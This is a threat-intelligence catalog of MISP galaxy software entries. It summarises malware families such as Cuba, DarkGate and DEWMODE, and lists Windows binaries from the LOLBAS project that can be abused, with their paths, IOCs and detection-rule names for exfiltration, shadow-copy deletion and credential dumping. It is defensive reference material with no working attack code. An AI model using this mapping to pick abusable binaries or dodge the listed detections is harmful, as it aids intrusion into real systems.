csi.exe - Associated Software

<sup>[[csi.exe - LOLBAS Project](/references/b810ee91-de4e-4c7b-8fa8-24dca95133e5)]</sup>

The tag is: misp-galaxy:software="csi.exe - Associated Software"

csi

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Command line interface included with Visual Studio.

Author: Oddvar Moe

Paths:

* c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
* c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe

The tag is: misp-galaxy:software="csi"

CSPY Downloader

The tag is: misp-galaxy:software="CSPY Downloader"

Cuba

[Cuba](https://app.tidalcyber.com/software/095064c6-144e-4935-b878-f82151bc08e4) is a Windows-based ransomware family that has been used against financial institutions, technology, and logistics organizations in North and South America as well as Europe since at least December 2019.<sup>[[McAfee Cuba April 2021](https://app.tidalcyber.com/references/e0e86e08-64ec-48dc-91e6-24fde989cd77)]</sup>

The tag is: misp-galaxy:software="Cuba"

CustomShellHost.exe - Associated Software

<sup>[[CustomShellHost.exe - LOLBAS Project](/references/96324ab1-7eb8-42dc-b19a-fa1d9f85e239)]</sup>

The tag is: misp-galaxy:software="CustomShellHost.exe - Associated Software"

CustomShellHost

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: A host process that is used by custom shells when using Windows in Kiosk mode.

Author: Wietze Beukema

Paths:

* C:\Windows\System32\CustomShellHost.exe

Detection:

* IOC: CustomShellHost.exe is unlikely to run on normal workstations
* Sigma: proc_creation_win_lolbin_customshellhost.yml<sup>[[CustomShellHost.exe - LOLBAS Project](/references/96324ab1-7eb8-42dc-b19a-fa1d9f85e239)]</sup>

The tag is: misp-galaxy:software="CustomShellHost"

Cyclops Blink

[Cyclops Blink](https://app.tidalcyber.com/software/68792756-7dbf-41fd-8d48-ac3cc2b52712) is a modular malware that has been used in widespread campaigns by [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) since at least 2019 to target Small/Home Office (SOHO) network devices, including WatchGuard and Asus.<sup>[[NCSC Cyclops Blink February 2022](https://app.tidalcyber.com/references/91ed6adf-f066-49e4-8ec7-1989bc6615a6)]</sup><sup>[[NCSC CISA Cyclops Blink Advisory February 2022](https://app.tidalcyber.com/references/bee6cf85-5cb9-4000-b82e-9e15aebfbece)]</sup><sup>[[Trend Micro Cyclops Blink March 2022](https://app.tidalcyber.com/references/64e9a24f-f386-4774-9874-063e0ebfb8e1)]</sup>

The tag is: misp-galaxy:software="Cyclops Blink"

Dacls

[Dacls](https://app.tidalcyber.com/software/9d521c18-09f0-47be-bfe5-e1bf26f7b928) is a multi-platform remote access tool used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) since at least December 2019.<sup>[[TrendMicro macOS Dacls May 2020](https://app.tidalcyber.com/references/0ef8691d-48ae-4057-82ef-eb086c05e2b9)]</sup><sup>[[SentinelOne Lazarus macOS July 2020](https://app.tidalcyber.com/references/489c52a2-34cc-47ff-b42b-9d48f83b9e90)]</sup>

The tag is: misp-galaxy:software="Dacls"

DanBot

[DanBot](https://app.tidalcyber.com/software/131c0eb2-9191-4ccd-a2d6-5f36046a8f2f) is a first-stage remote access Trojan written in C# that has been used by [HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735) since at least 2018.<sup>[[SecureWorks August 2019](https://app.tidalcyber.com/references/573edbb6-687b-4bc2-bc4a-764a548633b5)]</sup>

The tag is: misp-galaxy:software="DanBot"

Krademok - Associated Software

The tag is: misp-galaxy:software="Krademok - Associated Software"

DarkKomet - Associated Software

The tag is: misp-galaxy:software="DarkKomet - Associated Software"

Fynloski - Associated Software

The tag is: misp-galaxy:software="Fynloski - Associated Software"

FYNLOS - Associated Software

The tag is: misp-galaxy:software="FYNLOS - Associated Software"

DarkComet

[DarkComet](https://app.tidalcyber.com/software/74f88899-56d0-4de8-97de-539b3590ab90) is a Windows remote administration tool and backdoor.<sup>[[TrendMicro DarkComet Sept 2014](https://app.tidalcyber.com/references/fb365600-4961-43ed-8292-1c07cbc530ef)]</sup><sup>[[Malwarebytes DarkComet March 2018](https://app.tidalcyber.com/references/6a765a99-8d9f-4076-8741-6415a5ab918b)]</sup>

The tag is: misp-galaxy:software="DarkComet"

DarkGate

DarkGate is a commodity downloader. Researchers have often observed DarkGate samples making use of legitimate copies of AutoIt, a freeware BASIC-like scripting language, using it to run AutoIt scripts as part of its execution chain. Reports of DarkGate infections surged following the announcement of the disruption of the QakBot botnet by international authorities in late August 2023.<sup>[[Bleeping Computer DarkGate October 14 2023](/references/313e5558-d8f9-4457-9004-810d9fa5340c)]</sup> The delivery of DarkGate payloads via instant messaging platforms including Microsoft Teams and Skype was reported in September and October 2023.<sup>[[DarkGate Loader delivered via Teams - Truesec](/references/4222a06f-9528-4076-8037-a27012c2930c)]</sup><sup>[[Trend Micro DarkGate October 12 2023](/references/81650f5b-628b-4e76-80d6-2c15cf70d37a)]</sup>

The tag is: misp-galaxy:software="DarkGate"

DarkTortilla

[DarkTortilla](https://app.tidalcyber.com/software/35abcb6b-3259-57c1-94fc-50cfd5bde786) is a highly configurable .NET-based crypter that has been possibly active since at least August 2015. [DarkTortilla](https://app.tidalcyber.com/software/35abcb6b-3259-57c1-94fc-50cfd5bde786) has been used to deliver popular information stealers, RATs, and payloads such as [Agent Tesla](https://app.tidalcyber.com/software/304650b1-a0b5-460c-9210-23a5b53815a4), AsyncRat, [NanoCore](https://app.tidalcyber.com/software/db05dbaa-eb3a-4303-b37e-18d67e7e85a1), RedLine, [Cobalt Strike](https://app.tidalcyber.com/software/9b6bcbba-3ab4-4a4c-a233-cd12254823f6), and Metasploit.<sup>[[Secureworks DarkTortilla Aug 2022](https://app.tidalcyber.com/references/4b48cc22-55ac-5b61-b183-9008f7db37fd)]</sup>

The tag is: misp-galaxy:software="DarkTortilla"

DarkWatchman

[DarkWatchman](https://app.tidalcyber.com/software/740a0327-4caf-4d90-8b51-f3f9a4d59b37) is a lightweight JavaScript-based remote access tool (RAT) that avoids file operations; it was first observed in November 2021.<sup>[[Prevailion DarkWatchman 2021](https://app.tidalcyber.com/references/449e7b5c-7c62-4a63-a676-80026a597fc9)]</sup>

The tag is: misp-galaxy:software="DarkWatchman"

Nioupale - Associated Software

The tag is: misp-galaxy:software="Nioupale - Associated Software"

Muirim - Associated Software

The tag is: misp-galaxy:software="Muirim - Associated Software"

Daserf

[Daserf](https://app.tidalcyber.com/software/fad65026-57c4-4d4f-8803-87178dd4b887) is a backdoor that has been used to spy on and steal from Japanese, South Korean, Russian, Singaporean, and Chinese victims. Researchers have identified versions written in both Visual C and Delphi. <sup>[[Trend Micro Daserf Nov 2017](https://app.tidalcyber.com/references/4ca0e6a9-8c20-49a0-957a-7108083a8a29)]</sup> <sup>[[Secureworks BRONZE BUTLER Oct 2017](https://app.tidalcyber.com/references/c62d8d1a-cd1b-4b39-95b6-68f3f063dacf)]</sup>

The tag is: misp-galaxy:software="Daserf"

DataSvcUtil.exe - Associated Software

<sup>[[DataSvcUtil.exe - LOLBAS Project](/references/0c373780-3202-4036-8c83-f3d468155b35)]</sup>

The tag is: misp-galaxy:software="DataSvcUtil.exe - Associated Software"

DataSvcUtil

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.

Author: Ialle Teixeira

Paths:

* C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe

Detection:

* Sigma: [proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml)
* IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory.
* IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS.
* IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.<sup>[[DataSvcUtil.exe - LOLBAS Project](/references/0c373780-3202-4036-8c83-f3d468155b35)]</sup>

The tag is: misp-galaxy:software="DataSvcUtil"

DCSrv

[DCSrv](https://app.tidalcyber.com/software/26ae3cd1-6710-4807-b674-957bd67d3e76) is destructive malware that has been used by [Moses Staff](https://app.tidalcyber.com/groups/a41725c5-eb3a-4772-8d1e-17c3bbade79c) since at least September 2021. Though [DCSrv](https://app.tidalcyber.com/software/26ae3cd1-6710-4807-b674-957bd67d3e76) has ransomware-like capabilities, [Moses Staff](https://app.tidalcyber.com/groups/a41725c5-eb3a-4772-8d1e-17c3bbade79c) does not demand ransom or offer a decryption key.<sup>[[Checkpoint MosesStaff Nov 2021](https://app.tidalcyber.com/references/d6da2849-cff0-408a-9f09-81a33fc88a56)]</sup>

The tag is: misp-galaxy:software="DCSrv"

DDKONG

The tag is: misp-galaxy:software="DDKONG"

DEADEYE.EMBED - Associated Software

The tag is: misp-galaxy:software="DEADEYE.EMBED - Associated Software"

DEADEYE.APPEND - Associated Software

The tag is: misp-galaxy:software="DEADEYE.APPEND - Associated Software"

DEADEYE

[DEADEYE](https://app.tidalcyber.com/software/e9533664-90c5-5b40-a40e-a69a2eda8bc9) is a malware launcher that has been used by [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) since at least May 2021. [DEADEYE](https://app.tidalcyber.com/software/e9533664-90c5-5b40-a40e-a69a2eda8bc9) has variants that can either embed a payload inside a compiled binary (DEADEYE.EMBED) or append it to the end of a file (DEADEYE.APPEND).<sup>[[Mandiant APT41](https://app.tidalcyber.com/references/e54415fe-40c2-55ff-9e75-881bc8a912b8)]</sup>

The tag is: misp-galaxy:software="DEADEYE"

DealersChoice

The tag is: misp-galaxy:software="DealersChoice"

DEATHRANSOM

The tag is: misp-galaxy:software="DEATHRANSOM"

DefaultPack.EXE - Associated Software

<sup>[[DefaultPack.EXE - LOLBAS Project](/references/106efc3e-5816-44ae-a384-5e026e68ab89)]</sup>

The tag is: misp-galaxy:software="DefaultPack.EXE - Associated Software"

DefaultPack

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: This binary can be downloaded alongside multiple software downloads on the Microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.

Author: @checkymander

Paths:

* C:\Program Files (x86)\Microsoft\DefaultPack\

Detection:

* Sigma: [proc_creation_win_lolbin_defaultpack.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml)
* IOC: DefaultPack.EXE spawned an unknown process<sup>[[DefaultPack.EXE - LOLBAS Project](/references/106efc3e-5816-44ae-a384-5e026e68ab89)]</sup>

The tag is: misp-galaxy:software="DefaultPack"

Defender Control

Defender Control is a tool purpose-built to disable Microsoft Defender.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Defender Control"

PHOTO - Associated Software

The tag is: misp-galaxy:software="PHOTO - Associated Software"

Derusbi

[Derusbi](https://app.tidalcyber.com/software/9222aa77-922e-43c7-89ad-71067c428fb2) is malware used by multiple Chinese APT groups.<sup>[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]</sup><sup>[[ThreatConnect Anthem](https://app.tidalcyber.com/references/61ecd0b4-6cac-4d9f-8e8c-3d488fef6fec)]</sup> Both Windows and Linux variants have been observed.<sup>[[Fidelis Turbo](https://app.tidalcyber.com/references/f19877f1-3e0f-4c68-b6c9-ef5b0bd470ed)]</sup>

The tag is: misp-galaxy:software="Derusbi"

Desk.cpl - Associated Software

<sup>[[Desk.cpl - LOLBAS Project](/references/487a54d9-9f90-478e-b305-bd041af55e12)]</sup>

The tag is: misp-galaxy:software="Desk.cpl - Associated Software"

Desk

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Desktop Settings Control Panel

Author: Hai Vaknin

Paths:

* C:\Windows\System32\desk.cpl
* C:\Windows\SysWOW64\desk.cpl

Detection:

* Sigma: [file_event_win_new_src_file.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_new_src_file.yml)
* Sigma: [proc_creation_win_lolbin_rundll32_installscreensaver.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml)
* Sigma: registry_set_scr_file_executed_by_rundll32.yml<sup>[[Desk.cpl - LOLBAS Project](/references/487a54d9-9f90-478e-b305-bd041af55e12)]</sup>

The tag is: misp-galaxy:software="Desk"

Desktopimgdownldr.exe - Associated Software

<sup>[[Desktopimgdownldr.exe - LOLBAS Project](/references/1df3aacf-76c4-472a-92c8-2a85ae9e2860)]</sup>

The tag is: misp-galaxy:software="Desktopimgdownldr.exe - Associated Software"

Desktopimgdownldr

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows binary used to configure lockscreen/desktop image

Author: Gal Kristal

Paths:

* c:\windows\system32\desktopimgdownldr.exe

Detection:

* Sigma: [proc_creation_win_desktopimgdownldr_susp_execution.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml)
* Sigma: [file_event_win_susp_desktopimgdownldr_file.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml)
* Elastic: [command_and_control_remote_file_copy_desktopimgdownldr.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml)
* IOC: desktopimgdownldr.exe that creates a non-image file
* IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl<sup>[[Desktopimgdownldr.exe - LOLBAS Project](/references/1df3aacf-76c4-472a-92c8-2a85ae9e2860)]</sup>

The tag is: misp-galaxy:software="Desktopimgdownldr"

DeviceCredentialDeployment.exe - Associated Software

<sup>[[DeviceCredentialDeployment.exe - LOLBAS Project](/references/fef281e8-8138-4420-b11b-66d1e6a19805)]</sup>

The tag is: misp-galaxy:software="DeviceCredentialDeployment.exe - Associated Software"

DeviceCredentialDeployment

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Device Credential Deployment

Author: Elliot Killick

Paths:

* C:\Windows\System32\DeviceCredentialDeployment.exe

Resources: None Provided

Detection:

* IOC: DeviceCredentialDeployment.exe should not be run on a normal workstation
* Sigma: proc_creation_win_lolbin_device_credential_deployment.yml<sup>[[DeviceCredentialDeployment.exe - LOLBAS Project](/references/fef281e8-8138-4420-b11b-66d1e6a19805)]</sup>

The tag is: misp-galaxy:software="DeviceCredentialDeployment"

Devinit.exe - Associated Software

<sup>[[Devinit.exe - LOLBAS Project](/references/27343583-c17d-4c11-a7e3-14d725756556)]</sup>

The tag is: misp-galaxy:software="Devinit.exe - Associated Software"

Devinit

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Visual Studio 2019 tool

Author: mr.d0x

Paths:

* C:\Program Files\Microsoft Visual Studio\*\Community\Common7\Tools\devinit\devinit.exe
* C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\Tools\devinit\devinit.exe

Detection:

* Sigma: proc_creation_win_devinit_lolbin_usage.yml<sup>[[Devinit.exe - LOLBAS Project](/references/27343583-c17d-4c11-a7e3-14d725756556)]</sup>

The tag is: misp-galaxy:software="Devinit"

Devtoolslauncher.exe - Associated Software

<sup>[[Devtoolslauncher.exe - LOLBAS Project](/references/cb263978-019c-40c6-b6de-61db0e7a8941)]</sup>

The tag is: misp-galaxy:software="Devtoolslauncher.exe - Associated Software"

Devtoolslauncher

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary will execute specified binary. Part of VS/VScode installation.

Author: felamos

Paths:

* c:\windows\system32\devtoolslauncher.exe

Detection:

* Sigma: [proc_creation_win_lolbin_devtoolslauncher.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml)
* IOC: DeveloperToolsSvc.exe spawned an unknown process<sup>[[Devtoolslauncher.exe - LOLBAS Project](/references/cb263978-019c-40c6-b6de-61db0e7a8941)]</sup>

The tag is: misp-galaxy:software="Devtoolslauncher"

devtunnel.exe - Associated Software

<sup>[[devtunnel.exe - LOLBAS Project](/references/657c8b4c-1eee-4997-8461-c7592eaed9e8)]</sup>

The tag is: misp-galaxy:software="devtunnel.exe - Associated Software"

devtunnel

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary to enable forwarded ports on Windows operating systems.

Author: Kamran Saifullah

Paths:

* C:\Users\<username>\AppData\Local\Temp\.net\devtunnel\
* C:\Users\<username>\AppData\Local\Temp\DevTunnels

Detection:

* IOC: devtunnel.exe binary spawned
* IOC: .devtunnels.ms
* IOC: *..devtunnels.ms
* Analysis: https://cydefops.com/vscode-data-exfiltration<sup>[[devtunnel.exe - LOLBAS Project](/references/657c8b4c-1eee-4997-8461-c7592eaed9e8)]</sup>

The tag is: misp-galaxy:software="devtunnel"

DEWMODE

According to joint Cybersecurity Advisory AA23-158A (June 2023), DEWMODE is a web shell written in PHP that is designed to interact with a MySQL database. During a campaign from 2020 to 2021, threat actors exploited multiple zero-day vulnerabilities in internet-facing Accellion File Transfer Appliance (FTA) devices, installing DEWMODE web shells to exfiltrate data from compromised networks.<sup>[[Mandiant MOVEit Transfer June 2 2023](/references/232c7555-0483-4a57-88cb-71a990f7d683)]</sup>

Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/dewmode/

The tag is: misp-galaxy:software="DEWMODE"

Dfshim.dll - Associated Software

<sup>[[Dfshim.dll - LOLBAS Project](/references/30503e42-6047-46a9-8189-e6caa5f4deb0)]</sup>

The tag is: misp-galaxy:software="Dfshim.dll - Associated Software"

Dfshim

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: ClickOnce engine in Windows used by .NET

Author: Oddvar Moe

Paths:

* C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe

Detection:

* Sigma: proc_creation_win_rundll32_susp_activity.yml<sup>[[Dfshim.dll - LOLBAS Project](/references/30503e42-6047-46a9-8189-e6caa5f4deb0)]</sup>

The tag is: misp-galaxy:software="Dfshim"

Dfsvc.exe - Associated Software

<sup>[[Dfsvc.exe - LOLBAS Project](/references/7f3a78c0-68b2-4a9d-ae6a-6e63e8ddac3f)]</sup>

The tag is: misp-galaxy:software="Dfsvc.exe - Associated Software"

Dfsvc

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: ClickOnce engine in Windows used by .NET

Author: Oddvar Moe

Paths:

* C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe

Detection:

* Sigma: proc_creation_win_rundll32_susp_activity.yml<sup>[[Dfsvc.exe - LOLBAS Project](/references/7f3a78c0-68b2-4a9d-ae6a-6e63e8ddac3f)]</sup>

The tag is: misp-galaxy:software="Dfsvc"

Diantz.exe - Associated Software

<sup>[[diantz.exe_lolbas](/references/66652db8-5594-414f-8a6b-83d708a0c1fa)]</sup>

The tag is: misp-galaxy:software="Diantz.exe - Associated Software"

Diantz

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary that package existing files into a cabinet (.cab) file

Author: Tamir Yehuda

Paths:

* c:\windows\system32\diantz.exe
* c:\windows\syswow64\diantz.exe

Detection:

* Sigma: [proc_creation_win_lolbin_diantz_ads.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml)
* Sigma: [proc_creation_win_lolbin_diantz_remote_cab.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml)
* IOC: diantz storing data into alternate data streams.
* IOC: diantz getting a file from a remote machine or the internet.<sup>[[diantz.exe_lolbas](/references/66652db8-5594-414f-8a6b-83d708a0c1fa)]</sup>

The tag is: misp-galaxy:software="Diantz"

Diavol

[Diavol](https://app.tidalcyber.com/software/d057b6e7-1de4-4f2f-b374-7e879caecd67) is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. [Diavol](https://app.tidalcyber.com/software/d057b6e7-1de4-4f2f-b374-7e879caecd67) has been deployed by [Bazar](https://app.tidalcyber.com/software/b35d9817-6ead-4dbd-a2fa-4b8e217f8eac) and is thought to have potential ties to Wizard Spider.<sup>[[Fortinet Diavol July 2021](https://app.tidalcyber.com/references/28c650f2-8ce8-4c78-ab4a-cae56c1548ed)]</sup><sup>[[FBI Flash Diavol January 2022](https://app.tidalcyber.com/references/a1691741-9ecd-4b20-8cc9-b9bdfc1592b5)]</sup><sup>[[DFIR Diavol Ransomware December 2021](https://app.tidalcyber.com/references/eb89f18d-684c-4220-b2a8-967f1f8f9162)]</sup>

The tag is: misp-galaxy:software="Diavol"

Dipsind

[Dipsind](https://app.tidalcyber.com/software/226ee563-4d49-48c2-aa91-82999f43ce30) is a malware family of backdoors that appear to be used exclusively by [PLATINUM](https://app.tidalcyber.com/groups/f036b992-4c3f-47b7-a458-94ac133bce74). <sup>[[Microsoft PLATINUM April 2016](https://app.tidalcyber.com/references/d0ec5037-aa7f-48ee-8d37-ff8fb2c8c297)]</sup>

The tag is: misp-galaxy:software="Dipsind"

Disco

[Disco](https://app.tidalcyber.com/software/194314e3-4edc-5346-96b6-d2d7bf5d830a) is a custom implant that has been used by [MoustachedBouncer](https://app.tidalcyber.com/groups/f31df12e-66ea-5a49-87bc-2bc1756a89fc) since at least 2020 including in campaigns using targeted malicious content injection for initial access and command and control.<sup>[[MoustachedBouncer ESET August 2023](https://app.tidalcyber.com/references/9070f14b-5d5e-5f6d-bcac-628478e01242)]</sup>

The tag is: misp-galaxy:software="Disco"

Diskshadow.exe - Associated Software

<sup>[[Diskshadow.exe - LOLBAS Project](/references/27a3f0b4-e699-4319-8b52-8eae4581faa2)]</sup>

The tag is: misp-galaxy:software="Diskshadow.exe - Associated Software"

Diskshadow

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).

Author: Oddvar Moe

Paths:

* C:\Windows\System32\diskshadow.exe
* C:\Windows\SysWOW64\diskshadow.exe

Detection:

* Sigma: [proc_creation_win_lolbin_diskshadow.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml)
* Sigma: [proc_creation_win_susp_shadow_copies_deletion.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml)
* Elastic: [credential_access_cmdline_dump_tool.toml](https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml)
* IOC: Child process from diskshadow.exe<sup>[[Diskshadow.exe - LOLBAS Project](/references/27a3f0b4-e699-4319-8b52-8eae4581faa2)]</sup>

The tag is: misp-galaxy:software="Diskshadow"

Dnscmd.exe - Associated Software

<sup>[[Dnscmd.exe - LOLBAS Project](/references/3571ca9d-3388-4e74-8b30-dd92ef2b5f10)]</sup>

The tag is: misp-galaxy:software="Dnscmd.exe - Associated Software"

Dnscmd

Dnscmd is a Windows command-line utility used to manage DNS servers.<sup>[[Dnscmd Microsoft](/references/24b1cb7b-357f-470f-9715-fa0ec3958cbb)]</sup>

The tag is: misp-galaxy:software="Dnscmd"

DnsSystem

[DnsSystem](https://app.tidalcyber.com/software/e69a913d-4ddc-4d69-9961-25a31cae5899) is a .NET based DNS backdoor, which is a customized version of the open source tool DIG.net, that has been used by [HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735) since at least June 2022.<sup>[[Zscaler Lyceum DnsSystem June 2022](https://app.tidalcyber.com/references/eb78de14-8044-4466-8954-9ca44a17e895)]</sup>

The tag is: misp-galaxy:software="DnsSystem"

dnx.exe - Associated Software

<sup>[[dnx.exe - LOLBAS Project](/references/50652a27-c47b-41d4-a2eb-2ebf74e5bd09)]</sup>

The tag is: misp-galaxy:software="dnx.exe - Associated Software"

dnx

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: .Net Execution environment file included with .Net.

Author: Oddvar Moe

Paths:

* N/A

The tag is: misp-galaxy:software="dnx"

DOGCALL

[DOGCALL](https://app.tidalcyber.com/software/81ce23c0-f505-4d75-9928-4fbd627d3bc2) is a backdoor used by [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. <sup>[[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]</sup>

The tag is: misp-galaxy:software="DOGCALL"

Retefe - Associated Software

The tag is: misp-galaxy:software="Retefe - Associated Software"

Dok

[Dok](https://app.tidalcyber.com/software/dfa14314-3c64-4a10-9889-0423b884f7aa) is a Trojan application disguised as a .zip file that is able to collect user credentials and install a malicious proxy server to redirect a user's network traffic (i.e. Adversary-in-the-Middle).<sup>[[objsee mac malware 2017](https://app.tidalcyber.com/references/08227ae5-4086-4c31-83d9-459c3a097754)]</sup><sup>[[hexed osx.dok analysis 2019](https://app.tidalcyber.com/references/96f9d36a-01a5-418e-85f4-957e58d49c1b)]</sup><sup>[[CheckPoint Dok](https://app.tidalcyber.com/references/8c178fd8-db34-45c6-901a-a8b2c178d809)]</sup>

The tag is: misp-galaxy:software="Dok"

Doki

